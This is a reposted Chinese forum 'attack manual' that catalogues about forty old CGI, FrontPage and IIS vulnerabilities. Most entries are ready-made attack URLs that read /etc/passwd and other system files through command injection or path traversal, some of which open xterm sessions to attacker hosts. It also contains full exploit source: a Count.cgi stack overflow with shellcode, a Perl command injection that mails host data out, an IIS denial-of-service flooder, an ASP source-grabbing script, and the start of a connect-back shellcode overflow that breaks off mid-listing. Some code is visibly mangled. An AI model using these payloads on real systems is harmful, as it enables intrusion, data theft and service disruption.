阅读:33286回复:0
网络程序攻击手册 zt
网络程序攻击手册
前一段拜读了小许的《CGI漏洞攻击手册version-0.02》,觉得这种文章的确很重要,但现在的网络程序攻击已不仅仅局限于CGI和pl程序了,所以这回从网上找来了一些常见的asp程序漏洞并加了进来,改名为《网络程序攻击手册》并且修正了原来《CGI漏洞攻击手册version-0.02》那段攻击Count.cgi程序的不完整性,希望对大家有所帮助! ----无用君 一. phf漏洞 这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd: lynx http://www.victim.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 但是我们还能找到它吗? 二. php.cgi 2.0beta10或更早版本的漏洞 可以读nobody权限的所有文件. lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd、/etc/security/passwd等. 三. whois_raw.cgi lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd lynx http://www.victim.com/cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/ xterm%20-display%20graziella.lame.org:0 四. faxsurvey lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 五. textcounter.pl 如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令. #!/usr/bin/perl $URL=\'http://dtp.kappa.ro/a/test.shtml\'; # please _DO_ _modify_ this $EMAIL=\'pdoru@pop3.kappa.ro,root\'; # please _DO_ _modify_ this if ($ARGV[0]) { $CMD=$ARGV[0];}else{ $CMD=\"(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)|mail ${EMAIL} -sanothere_one\"; }$text=\"${URL}/;IFS=8;${CMD};echo|\";$text =~ s/ /${IFS}/g;#print \"$textn\"; system({\"wget\"} \"wget\", $text, \"-O/dev/null\"); system({\"wget\"} \"wget\", $text, \"-O/dev/null\"); #system({\"lynx\"} \"lynx\", $text); #如果没有wget命令也可以用lynx #system({\"lynx\"} \"lynx\", $text); 六. 一些版本(1.1)的info2www的漏洞 $ REQUEST_METHOD=GET ./info2www \'(../../../../../../../bin/mail jami $ You have new mail. $ 说实在我不太明白.:( 七. pfdispaly.cgi lynx -source \'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd\' pfdisplay.cgi还有另外一个漏洞可以执行命令 lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?\'%0A/bin/uname%20-a|\' or lynx -dump http://victim/cgi-bin/pfdispaly.cgi?\'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|\' 八. wrap lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc 九. www-sql 可以让你读一些受限制的页面如: 在你的浏览器里输入:http://your.server/protected/something.html: 被要求输入帐号和口令.而有www-sql就不必了: http://your.server/cgi-bin/www-sql/protected/something.html: 十. view-source lynx http://www.victim.com/cgi-bin/view-source?../../../../../../../etc/passwd 十一.campas lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a 十二.webgais telnet www.victim.com 80 POST /cgi-bin/webgais HTTP/1.0 Content-length: 85 (replace this with the actual length of the \"exploit\"line) query=\';mail+drazvan@pop3.kappa.ro 十三.websendmail telnet www.victim.com 80 POST /cgi-bin/websendmail HTTP/1.0 Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90) receiver=;mail+your_address@somewhere.org 十四.handler telnet www.victim.com 80 GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=DownloadHTTP/1.0 or GET /cgi-bin/handler/blah;xwsh -display yourhost.com|?data=Download or GET /cgi-bin/handler/;xterm-displaydanish:0-e/bin/sh|?data=Download 注意,cat后是TAB键而不是空格,服务器会报告不能打开useless_shit,但仍旧执行下面命令. 十五.test-cgi lynx http://www.victim.com/cgi-bin/test-cgi?whatever CGI/1.0 test script report: argc is 0. argv is . SERVER_SOFTWARE = NCSA/1.4B SERVER_NAME = victim.com GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/1.0 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = text/plain, application/x-html, application/html, text/html, text/x-html PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /cgi-bin/test-cgi QUERY_STRING = whatever REMOTE_HOST = fifth.column.gov REMOTE_ADDR = 200.200.200.200 REMOTE_USER = AUTH_TYPE = CONTENT_TYPE = CONTENT_LENGTH = 得到一些http的目录 lynx http://www.victim.com/cgi-bin/test-cgi?help&0a/bin/cat%20/etc/passwd 这招好象并不管用.:( lynx http://www.victim.com/cgi-bin/nph-test-cgi?/* 还可以这样试 GET /cgi-bin/test-cgi?* HTTP/1.0 GET /cgi-bin/test-cgi?x * GET /cgi-bin/nph-test-cgi?* HTTP/1.0 GET /cgi-bin/nph-test-cgi?x * GET /cgi-bin/test-cgi?x HTTP/1.0 * GET /cgi-bin/nph-test-cgi?x HTTP/1.0 * 十六.对于某些BSD的apache可以: lynx http://www.victim.com/root/etc/passwd lynx http://www.victim.com/~root/etc/passwd 十七.htmlscript lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd 十八.jj.c The demo cgi program jj.c calls /bin/mail without filtering user input, so any program based on jj.c could potentially be exploited by simply adding a followed by a Unix command. It may require a password, but two known passwords include HTTPdrocks and SDGROCKS. If you can retrieve a copy of the compiled program running strings on it will probably reveil the password. Do a web search on jj.c to get a copy and study the code yourself if you have more questions. 十九.Frontpage extensions 如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions的版本和它在服务器上的路径. 还有一些密码文件如: http://www.victim.com/_vti_pvt/service.pwd http://www.victim.com/_vti_pvt/users.pwd http://www.victim.com/_vti_pvt/authors.pwd http://www.victim.com/_vti_pvt/administrators.pwd 二十.Freestats.com CGI 没有碰到过,觉的有些地方不能搞错,所以直接贴英文. John Carlton found following. He developed an exploit for the free web stats services offered at freestats.com, and supplied the webmaster with proper code to patch the bug. Start an account with freestats.com, and log in. Click on the area that says \"CLICK HERE TO EDIT YOUR USER PROFILE & COUNTER INFO\" This will call up a file called edit.pl with your user # and password included in it. Save this file to your hard disk and open it with notepad. The only form of security in this is a hidden attribute on the form element of your account number. Change this from *input type=hidden name=account value=your#* to *input type=text name=account value=\"\"* Save your page and load it into your browser. Their will now be a text input box where the hidden element was before. Simply type a # in and push the \"click here to update user profile\" and all the information that appears on your screen has now been written to that user profile. But that isn\'t the worst of it. By using frames (2 frames, one to hold this page you just made, and one as a target for the form submission) you could change the password on all of their accounts with a simple JavaScript function. Deep inside the web site authors still have the good old \"edit.pl\" script. It takes some time to reach it (unlike the path described) but you can reach it directly at: http://www.sitetracker.com/cgi-bin/edit.pl?account=&password= 二十一.Vulnerability in Glimpse HTTP telnet target.machine.com 80 GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor@dhp.com HTTP/1.0 二十二.Count.cgi 该程序只对Count.cgi 24以下版本有效: /*### count.c ########################################################*/ #include <stdio.h> #include <stdlib.h> #include <getopt.h> #include <unistd.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <netdb.h> #include <errno.h> /* Forwards */ unsigned long getsp(int); int usage(char *); void doit(char *,long, char *); /* Constants */ char shell[]= \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90\" \"xebx3cx5ex31xc0x89xf1x8dx5ex18x88x46x2cx88x46x30\" \"x88x46x39x88x46x4bx8dx56x20x89x16x8dx56x2dx89x56\" \"x04x8dx56x31x89x56x08x8dx56x3ax89x56x0cx8dx56x10\" \"x89x46x10xb0x0bxcdx80x31xdbx89xd8x40xcdx80xe8xbf\" \"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff\" \"xffxffxffxffxffxffxffxffxffxffxff\" \"/usr/X11R6/bin/xterm0-ut0-display0\"; char endpad[]= \"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff\" \"xffxffxffxffxffxffxffxffxffxffxff\"; int main (int argc, char *argv[]){ char *shellcode = NULL; int cnt,ver,retcount, dispnum,dotquads[4],offset; unsigned long sp; char dispname[255]; char *host; offset = sp = cnt = ver = 0; fprintf(stderr,\"t%s - Gusn\",argv[0]); if (argc<3) usage(argv[0]); while ((cnt = getopt(argc,argv,\"h:d:v:o:\")) != EOF) { switch(cnt){ case \'h\': host = optarg; break; case \'d\': { retcount = sscanf(optarg, \"%d.%d.%d.%d:%d\", &dotquads[0], &dotquads[1], &dotquads[2], &dotquads[3], &dispnum); if (retcount != 5) usage(argv[0]); sprintf(dispname, \"%03d.%03d.%03d.%03d:%01d\", dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum); shellcode=malloc(strlen((char *)optarg)+strlen(shell)+strlen(endpad)); sprintf(shellcode,\"%s%s%s\",shell,dispname,endpad); } break; case \'v\': ver = atoi(optarg); break; case \'o\': offset = atoi(optarg); break; default: usage(argv[0]); break; } } sp = offset + getsp(ver); (void)doit(host,sp,shellcode); exit(0); } unsigned long getsp(int ver) { /* Get the stack pointer we should be using. YMMV. If it does not work, try using -o X, where x is between -1500 and 1500 */ unsigned long sp=0; if (ver == 15) sp = 0xbfffea50; if (ver == 20) sp = 0xbfffea50; if (ver == 22) sp = 0xbfffeab4; if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */ if (sp == 0) { fprintf(stderr,\"I don\'t have an sp for that version try using the -o option.n\"); fprintf(stderr,\"Versions above 24 are patched for this bug.n\"); exit(1); } else { return sp; } } int usage (char *name) { fprintf(stderr,\"tUsage:%s -h host -d <display> -v <version> [-o <offset>]n\",name); fprintf(stderr,\"te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22n\",name); exit(1); } int openhost (char *host, int port) { int sock; struct hostent *he; struct sockaddr_in sa; he = gethostbyname(host); if (he == NULL) { perror(\"Bad hostnamen\"); exit(-1); } memcpy(&sa.sin_addr, he->h_addr, he->h_length); sa.sin_port=htons(port); sa.sin_family=AF_INET; sock=socket(AF_INET,SOCK_STREAM,0); if (sock < 0) { perror (\"cannot open socket\"); exit(-1); } bzero(&sa.sin_zero,sizeof (sa.sin_zero)); if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) { perror(\"cannot connect to host\"); exit(-1); } return(sock); } void doit (char *host,long sp, char *shellcode) { int cnt,sock; char qs[7000]; int bufsize = 16; char buf[bufsize]; char chain[] = \"user=a\"; bzero(buf); for(cnt=0;cnt<4104;cnt+=4) { qs[cnt+0] = sp & 0x000000ff; qs[cnt+1] = (sp & 0x0000ff00) >> 8; qs[cnt+2] = (sp & 0x00ff0000) >> 16; qs[cnt+3] = (sp & 0xff000000) >> 24; } strcpy(qs,chain); qs[strlen(chain)]=0x90; qs[4104]= sp&0x000000ff; qs[4105]=(sp&0x0000ff00)>>8; qs[4106]=(sp&0x00ff0000)>>16; qs[4107]=(sp&0xff000000)>>24; qs[4108]= sp&0x000000ff; qs[4109]=(sp&0x0000ff00)>>8; qs[4110]=(sp&0x00ff0000)>>16; qs[4111]=(sp&0xff000000)>>24; qs[4112]= sp&0x000000ff; qs[4113]=(sp&0x0000ff00)>>8; qs[4114]=(sp&0x00ff0000)>>16; qs[4115]=(sp&0xff000000)>>24; qs[4116]= sp&0x000000ff; qs[4117]=(sp&0x0000ff00)>>8; qs[4118]=(sp&0x00ff0000)>>16; qs[4119]=(sp&0xff000000)>>24; qs[4120]= sp&0x000000ff; qs[4121]=(sp&0x0000ff00)>>8; qs[4122]=(sp&0x00ff0000)>>16; qs[4123]=(sp&0xff000000)>>24; qs[4124]= sp&0x000000ff; qs[4125]=(sp&0x0000ff00)>>8; qs[4126]=(sp&0x00ff0000)>>16; qs[4127]=(sp&0xff000000)>>24; qs[4128]= sp&0x000000ff; qs[4129]=(sp&0x0000ff00)>>8; qs[4130]=(sp&0x00ff0000)>>16; qs[4131]=(sp&0xff000000)>>24; strcpy((char*)&qs[4132],shellcode); sock = openhost(host,80); write(sock,\"GET /cgi-bin/Count.cgi?\",23); write(sock,qs,strlen(qs)); write(sock,\" HTTP/1.0n\",10); write(sock,\"User-Agent: \",12); write(sock,qs,strlen(qs)); write(sock,\"nn\",2); sleep(1); /* printf(\"GET /cgi-bin/Count.cgi?%s HTTP/1.0nUser-Agent: %snn\",qs,qs); */ /* setenv(\"HTTP_USER_AGENT\",qs,1); setenv(\"QUERY_STRING\",qs,1); system(\"./Count.cgi\"); */ } 用法是:count -h <攻击目标IP> -d <显示> -v <Count.cgi的版本> 例如:count -h www.foo.bar -d 127.0.0.1:0 -v 22 用Count.cgi看图片 http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../../../../../path_to_gif/file.gif 二十三.finger.cgi lynx http://www.victim.com/cgi-bin/finger?@localhost 得到主机上登陆的用户名. 二十四.man.sh Robert Moniot found followung. The May 1998 issue of SysAdmin Magazine contains an article, \"Web-Enabled Man Pages\", which includes source code for very nice cgi script named man.sh to feed man pages to a web browser. The hypertext links to other man pages are an especially attractive feature. Unfortunately, this script is vulnerable to attack. Essentially, anyone who can execute the cgi thru their web browser can run any system commands with the user id of the web server and obtain the output from them in a web page. 二十五.FormHandler.cgi 在表格里加上 你的邮箱里就有/etc/passwd 二十六.JFS 相信大家都看过\"JFS 侵入 PCWEEK-LINUX 主机的详细过程\"这篇文章,他利用photoads 这个CGI模块攻入主机. 我没有实际攻击过,看文章的理解是这样 先lynx \"http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi? AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=% 0a11111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 11111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&pa ssword=0&CityStPhone=0&Renewed=0\" 创建新AD值绕过 $AdNum 的检查后用 lynx \'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi? file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111111111111111111111111111111 1111111111111111111111111111111111111111111111111111111&DataFile=1&Password=0&FILE _CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/ ../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif\' 创建/覆盖用户 nobody 有权写的任何文件. 不知我的理解是否对,在它的zip包里我找不到to_url脚本,不知哪位同志知道? 二十七.backdoor 看到现在一些cgichk.c里都有检查木马unlg1.1和rwwwshell.pl 前一个是UnlG写的,我没见过源码,有一个是THC写的,packetstorm里有它1.6版的源码. 二十八.shtml.dll 在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息: http://www.victim.com/_vti_bin/shtml.dll/something.html 这样将返回以下信息: Cannot open \"d:inetpubwwwrootpostinfo1.html\": no such file or folder. 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息: http://207.69.190.42/_vti_bin/shtml.dll/something.exe shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,以下这个程序,能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满: #include <stdio.h> #include <string.h> #include <winsock.h> #include <windows.h> #include <process.h> void Dos(void *chara); void main(int argc,char *argv[]) { WORD wVersionRequested; WSADATA wsaData; int err; long lDo ; if (argc < 2) { printf(\"Usage: %s IPn\",argv[0]); exit(1); return ; } wVersionRequested = MAKEWORD( 2, 2 ); err = WSAStartup( wVersionRequested, &wsaData ); if ( err != 0 ) { return; } if ( LOBYTE( wsaData.wVersion ) != 2 || HIBYTE( wsaData.wVersion ) != 2 ) { WSACleanup( ); return; } printf(\"wait ...n\"); for (lDo = 0 ;lDo < 1000;lDo++) { //printf(\"1n\"); _beginthread(Dos, 0, (void*)argv[1]); } Sleep( 1000000L ); } void Dos(void *chara) { long lLen; long lDo ; char *ip ; char buffer[2000]; struct sockaddr_in serv_addr; SOCKET sockfd ; char plusvuln[]=\"GET /_vti_bin/shtml.dll/\"; ip= (char*)chara; memset(buffer,\'0\',2000); serv_addr.sin_family =AF_INET; serv_addr.sin_addr.s_addr = inet_addr(\"192.168.0.131\"); serv_addr.sin_port = htons(80); if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0) { printf(\"Create Socket faild n\"); return ; } if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0) { printf(\"Connect faild n\");; } else { lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 ); for (lDo = 0 ;lDo < 7000;lDo ++) { lLen = send ( sockfd,\"postinfdddddddddd\",strlen(\"postinfdddddddddd\"),0) ; if (lLen < 0 ) { printf(\"Send faild n\"); return; } } lLen = send ( sockfd,\"tzl.html HTTP/1.0nn\",strlen(\"tzl.html HTTP/1.0nn\") + 1,0) ; //recv(sockfd,buffer,2000,0); //printf(buffer); //printf(\"n\"); } closesocket(sockfd); } 二十九.asp原代码暴露 http://somewhere/something.asp::$DATA 解决方案: 装sp3 http://somewhere/something.asp%2e 解决方案: 装sp4 http://somewhere/something.asp.(加一个点) 解决方案: 装sp4 http://somewhere/something%2e%41sp 或者 http://somewhere/something%2e%asp 解决方案: 装sp4 http://somewhere/something.asp%81 解决方案:装sp6或者打补丁 三十.null.htw 如果你的web目录下有asp文件,如存在http://www.xxx.com/asp/index.asp,则输入如下路径可以看到源码: http://www.xxx.com/null.htw?CiWebHitsFile=/asp/index.asp%20?CiRestriction=noneCiHiliteType=Full 三十一.showcode.asp http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp 三十二.SHTML.EXE 利用这个漏洞通过 FrontPage Server Extensions 的 shtml.exe 请求一URL,并且 URL 后要包含一个.htm extension 的 DOS 设备名。 http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_vti_bin/shtml.exe/com1 http://www.example.com/_vti_bin/shtml.exe/prn http://www.example.com/_vti_bin/shtml.exe/com1 http://www.example.com/_vti_bin/shtml.exe/aux http://www.example.com/_vti_bin/shtml.exe/pipe.htm 三十三.htimage.exe htimage存在三个安全问题: 1、暴露web根目录本地磁盘路径,正如你在上面看到的,使用下面的方式可以成功看到对方的web目录磁盘路径位置: http://www.xxx.com/cgi-bin/htimage.exe/linux?0,0 CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs in \"htimage.exe\": 1) Gives us the full path to the root directory 2) Simple buffer overflow 3) Allow us to access files. 2、缓冲溢出: 在 windows9x上,目标为Microsoft-PWS-95/2.0和 FrontPage-PWS32的服务器上测试通过。 http://www.xxx.com/cgi-bin/htimage.exe/<741个字符>?0,0. 这时在被攻击目标的控制台上将发现如下错误: HTIMAGE caused an invalid page fault in module <unknown> at 0000:41414141. Registers: 0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246 EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4 ECX=0054015c DS=013f ESI=005401a0 FS=3467 EDX=bff76648 ES=013f EDI=00540184 GS=0000 Bytes at CS:EIP: Stack dump: bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28 0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c server仍旧继续运行,出现 \"500 Server Error\" 3、可以访问文件,但不可读: http://www.xxx.com/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0 输出: --------------------------------------------------------------------------- Error Error calling HTImage: HTImage.c: Syntax error at line 1 Bad field name, expecting \'default\', \'rectangle\', \'circle\' or \'polygon\' (got an alphanumeric string) --------------------------------------------------------------------------- NOTE: Accessing \"/_vti_pvt/service.pwd\" outputs : 403 Forbidden 三十四.*.idc *.idq 暴露路径: 在IIS4.0中,只要没打services pack5,那么在www下输入这个路径: http://www.xxx.com/*.idc 将出现: 运行查询错误 无法打开查询文件 e:web*.idc。可能是文件不存在或是您没有打开文件所需的许可权。 这个已经在sp5中补掉了 然而在IIS5.0中,这个问题又冒了出来,如微软的主页: http://www.microsoft.com/vstudio/1.idq 将出现: The IDQ file d:httpproductsdeveloperdevonlyprodinfovstudio1.idq could not be found. 输入 http://www.microsoft.com/1.ida 将出现: The IDQ file d:http1.idq could not be found. 三十五.webhit.dll IIS4.0上有一个应用程序映射htw--->webhits.dll,这是用于Index Server的点击功能的。尽管你不运行Index Server,该映射仍然有效。这个应用程序映射存在漏洞,允许入侵者读取本地硬盘上的文件,数据库文件,和ASP源代码!有两种方法来实现,第一,如果你的web server上存在.htw后缀的文件,则可以过下面的方式来查看文件内容,比如查看odbc.ini文件的内容: http://www.xxx.com/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/odbc.ini?CiRestriction=noneCiHiliteType=Full 对于IIS的一般安装模式可以在下列位置找到.htw文件: /iissamples/issamples/oop/qfullhit.htw /iissamples/issamples/oop/qsumrhit.htw /iissamples/exair/search/qfullhit.htw /iissamples/exair/search/qsumrhit.htw /iishelp/iis/misc/iirturnh.htw 第二、如果你的web server上不存在这个文件,有漏洞的系统仍然允许用户调用 webhits.dll,具体方式如下: http://www.xxx.com/default.htm%20%20%20%20%20.htw?CiWebHitsFile=/../../winn t/odbc.ini?CiRestriction=noneCiHiliteType=Full 条件是default.htm必须存在。这个文件名可以是其它文件,但必须存在。 webhits.dll将会把这个文件作为临时文件打开。当上述URL中的空格符%20达到一定数 目时,web服务的识别功能可能会出现问题,这样webhits.dll将打开指定的文件winntodbc.ini。如果成功,用同样的方法可以打开更多的文件,包括ASP代码。近 似的原理请见下面这段代码: FILE *fd; int DoesTemplateExist(char *pathtohtwfile) { // Just in case inetinfo.exe passes too long a string // let\'s make sure it\'s of a suitable length and not // going to open a buffer overrun vulnerability char *file; file = (char *)malloc(250); strncpy(file,pathtohtwfile,250); fd = fopen(file,\"r\"); // Success if(fd !=NULL) { return 1; } // failed else { return 0; } } 三十六.Translate:f 在win2000及office 2000(包括FrontPage 2000及FrontPage 2000 server extensions)里的WebDAV存在着一个安全问题Translate:f。当某人往目标机器的ASP/ASA(或者其它脚本文件)发送包含有\"Translate:f\"文件头的 HTTP GET请求时,windows2000(没有打过SP1补丁的――现在打补丁的还不是很多吧 会返回该ASP/ASA的源代码而不是本该返回的经过处理的文件(还需要在url的结尾加上一个特殊字符\"/\")。 smiler就此漏洞发表了一个用perl写成的利用程序: -----------------------------start----------------------------------------- ------- #!/usr/bin/perl # Expl0it By smiler@vxd.org # Tested with sucess against IIS 5.0. Maybe it works against IIS 4.0 using a shared drive but I haven呆 tested it yet. # Get the source code of any script from the server using this exploit. # This code was written after Daniel Docekal brought this issue in BugTraq. # Cheers 351 and FractalG if (not $ARGV[0]) { print qq~ Geee it大 running !! kewl )) Usage : srcgrab.pl <complete url of file to retrieve> Example Usage : srcgrab.pl http://www.victimsite.com/global.asa U can also save the retrieved file using : srcgrab.pl http://www.victim.com/default.asp > file_to_save ~; exit;} $victimurl=$ARGV[0]; # Create a user agent object use LWP::UserAgent; $ua = new LWP::UserAgent; # Create a request my $req = new HTTP::Request GET => $victimurl . \'\\\'; # Here is the backslash at the end of the url $req->content_type(\'application/x-www-form-urlencoded\'); $req->content_type(\'text/html\'); $req->header(Translate => \'f\'); # Here is the famous translate header ) $req->content(\'match=www&errors=0\'); # Pass request to the user agent and get a response back my $res = $ua->request($req); # Check the outcome of the response if ($res->is_success) { print $res->content; } else { print $res->error_as_HTML; } ---------------------------------end--------------------------------------- 要使用这一程序,你可能需要下载几个perl的模块(可以到http://www.perl.org上去search) 1、libwww-perl-5.48.tar.gz 2、URI-1.09.tar.gz 3、HTML-Parser-3.11.tar.gz 每个包只有几十K大吧,下载解包后进入目录,运行 #perl Makefile.PL&&make&&make install 就可以了。have fun (有些asp文件可能要在url后加上?或者/才能看到源码) 三十七.ftp.pl http://www.server.com/cgi-bin/ftp/ftp.pl?dir=../../../../../../etc 这将暴露所有etc目录下面的文件。以此类推,你可以阅览其它目录下的东西,从而突破本身ftp目录的限制。 三十八.CGI-World Poll 任意远程用户通过GET请求指定。导致非授权的文件访问: http://www.victim.com/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/etc/passwd%00 三十九.Big Brother Big Brother 1.4H 以及更低版本存在一个安全问题,由于一个脚本对输入变量$HOSTSVC 缺乏正确检查,导致远程用户可以指定路径来浏览任意系统文件内容。 http://www.victim.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd 四十.Nortel Contivity package CGI 入侵者或恶意的用户将能使用类似以下的URL查看到系统上的所有文件。 http://x.x.x.x/manage/cgi/cgiproc?Nocfile=/name/and/path/of/file. (入侵者感兴趣的文件也许将会是:/system/filelist.dat, /system/version.dat,/system/keys, /system/core, etc) 四十一.wais.pl + waisq CGI wais.pl + waisq是运行在NCSA服务器上的一个WAIS接口CGI,在这个程序内部存在一个漏洞,能使攻击者通过远程溢出获得一个具有web server相同权限的shell。 /* OnWaisKlote.c - NCSA wais.pl + waisq remote overflow - by Scrippie The shellcode makes a connetion to the given IP and spawns a shell on port 27002. It\'s recommended to have a listening netcat ready on this port. Ie. do a \"nc -l -p 27002\" on your machine, and run the exploit on the target If everything works out, it\'ll connect and spawn a shell. */ #include #include #include #include #include #include #include #define FORBIDDEN \"x00x09x0bx0crn{};<>\\^()*[]$`&#~|\"\" #define SZ_SOURCEBUF 256 #define SZ_FILEBUF 256 #define RETADDY 0xbffff910 /* Works on my cute `lil box */ int wwwconnect(unsigned long ip); int ICinInt(long, char *, size_t); char *buildOverflow(unsigned long, unsigned int); void *xmalloc(size_t); /* Shellcode written by: Scrippie :) Smegma v0.5 ridded this shellcode of the following characters: \"x00x09x0bx0crn{};<>\\^()*[]$`&#~|\"\" For this purpose a xor mask of 0x92011e11 was brute forced */ char hellcode[] = \"xebx14x58x89xc6x31xc9xb1x25x81x36x11x1ex01x92x83xc6x04xe2\" \"xf5xebx05xe8xe7xffxffxffxfax64x5fxa3xd1x2fxdaxa3xc3xaex67\" \"x21x10x93x4fx8exa3x1fx88xc4x31xacx07x1bx47x3axb3x90x98x48\" \"x1dx5fx91x97x47x8ax98x08x67x55x57x1cx68xe8x98x58x1dx1fx17\" \"x97x47xb2x91xdcx0fx1bx47x3ax30x52x15x78x81x51x13x93x4fx8e\" \"xdcx9ex30x52x15x21x88x50x9ax40x19xa3xd8xd3x81x1bxc1x5fxcc\" \"x12x98xcex40x5fx91x2fxc1x1fx6fx11x81x53x16xedxabx96x1ax93\" \"x5fx9ax98x40x11x1fx5fx0ex30x40xdcx9ex30x52xefxdexccx12xf9\" \"x9fxfex6dxeex5fx40xd0x53xAAxAAxAAxAAx31x63xfbx7fx31x72xfa\"; /* The IP address to connect to is gonna be at 0xAAAAAAAA */ /* 